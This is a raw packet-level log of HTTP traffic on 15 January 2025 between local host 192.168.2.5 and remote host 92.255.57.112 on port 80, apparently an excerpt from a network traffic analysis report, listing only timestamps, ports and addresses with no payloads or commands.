Jan 15, 2025 10:09:10.141365051 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141383886 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141393900 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141571999 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141587973 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.141618967 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141781092 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141828060 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.141854048 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141866922 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141877890 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141889095 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.141900063 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.141932011 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.141932011 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.142682076 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.142760038 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.142771959 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.142782927 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.142793894 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.142817020 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.143224001 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.143601894 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.143620014 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.143630028 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.143640995 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.143652916 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.143665075 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.143698931 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.143698931 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.144449949 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.144470930 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.144481897 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.144716024 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.146404028 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.146416903 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.146429062 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.146559954 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.183418989 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183435917 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183449984 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183491945 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183505058 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183571100 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.183571100 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.183859110 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183896065 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183907986 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183918953 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.183948994 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.184345007 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.184402943 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.184437037 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.184456110 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.184468031 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.184479952 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.185394049 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.185406923 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.185420036 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.185431957 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.185445070 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.185450077 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.185450077 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.185861111 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.188502073 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.188522100 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.188536882 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.188549042 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.188564062 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.189631939 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.257838011 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.257857084 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.257875919 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.257889986 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.257903099 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.257915020 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.257927895 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.257925034 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.257940054 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258011103 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.258305073 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258346081 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258358955 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258378029 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.258399963 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.258410931 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258424044 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258434057 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258446932 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.258477926 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.258506060 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.259056091 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259088039 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259099007 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259149075 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259160995 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259171963 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.259174109 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259191990 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259197950 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.259211063 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.259217024 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.259253979 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.259994984 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260071993 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260083914 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260096073 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260109901 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260123968 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260135889 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260135889 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.260153055 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260173082 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.260200024 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.260936975 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260950089 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260961056 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260974884 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.260998011 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.261025906 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.264234066 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264245987 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264298916 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264311075 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264316082 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.264323950 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264336109 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264389038 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.264525890 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264588118 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264599085 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264718056 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264731884 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264750957 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264763117 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264772892 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.264772892 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.264775991 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.264816046 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.264816046 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265069962 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265083075 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265109062 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265130043 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265140057 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265152931 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265165091 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265178919 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265192032 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265206099 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265206099 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265243053 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265811920 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265825033 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265835047 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265847921 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265866041 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265877962 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265880108 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265902042 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265919924 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265929937 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265934944 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265934944 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265943050 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265957117 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265973091 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.265985012 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.265985012 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.266026020 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.266738892 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.266752958 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.266766071 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.266778946 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.266792059 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.266803980 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.266815901 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.266835928 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.266835928 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.266866922 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.304657936 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.304677963 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.304689884 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.304702997 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.304717064 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.304728985 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.304770947 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.304783106 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.304828882 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.304828882 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.304991961 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305037975 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305080891 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305093050 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305104017 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305118084 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.305159092 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.305309057 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305349112 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305363894 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.305366039 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305403948 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.305414915 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305425882 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305438042 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305449963 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305490971 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.305490971 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.305963039 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305974007 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.305988073 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306020021 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.306041956 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306052923 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306063890 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306102037 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306113005 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306123972 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306129932 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.306129932 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.306185007 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.306962967 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306976080 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306988001 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.306998968 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307010889 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307022095 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307040930 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.307044983 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307055950 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307058096 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.307069063 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307082891 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307120085 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.307120085 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.307910919 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307921886 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307934046 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307945013 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307959080 CET	80	49709	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.307984114 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.307984114 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.308012962 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.348510027 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.348556995 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.348716021 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.378742933 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.378771067 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.378783941 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.378794909 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.378828049 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.378839016 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.378839016 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.378851891 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.378911018 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.379080057 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379091978 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379102945 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379127026 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.379142046 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379149914 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.379157066 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379203081 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.379638910 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379650116 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379661083 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379673004 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379686117 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379698038 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379708052 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.379709005 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.379745960 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.380434990 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380445957 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380458117 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380470037 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380477905 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.380482912 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380495071 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380502939 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.380508900 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380522013 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.380530119 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.380552053 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.381303072 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381314993 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381325960 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381340027 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381349087 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.381352901 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381359100 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.381365061 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381376982 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381387949 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.381390095 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.381411076 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.382143021 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382164955 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382177114 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382205963 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.382230997 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382234097 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.382244110 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382255077 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382281065 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.382285118 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382298946 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.382339954 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.383100033 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383111954 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383125067 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383136034 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383153915 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383161068 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.383167028 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383176088 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.383198977 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.383260965 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383272886 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.383414984 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.384068012 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.384080887 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.384092093 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.384103060 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.384202003 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.387159109 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387176991 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387188911 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387200117 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387212992 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387273073 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.387343884 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387356043 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387366056 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387375116 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387387991 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387504101 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.387586117 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387598038 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.387639046 CET	80	49708	92.255.57.112	192.168.2.5
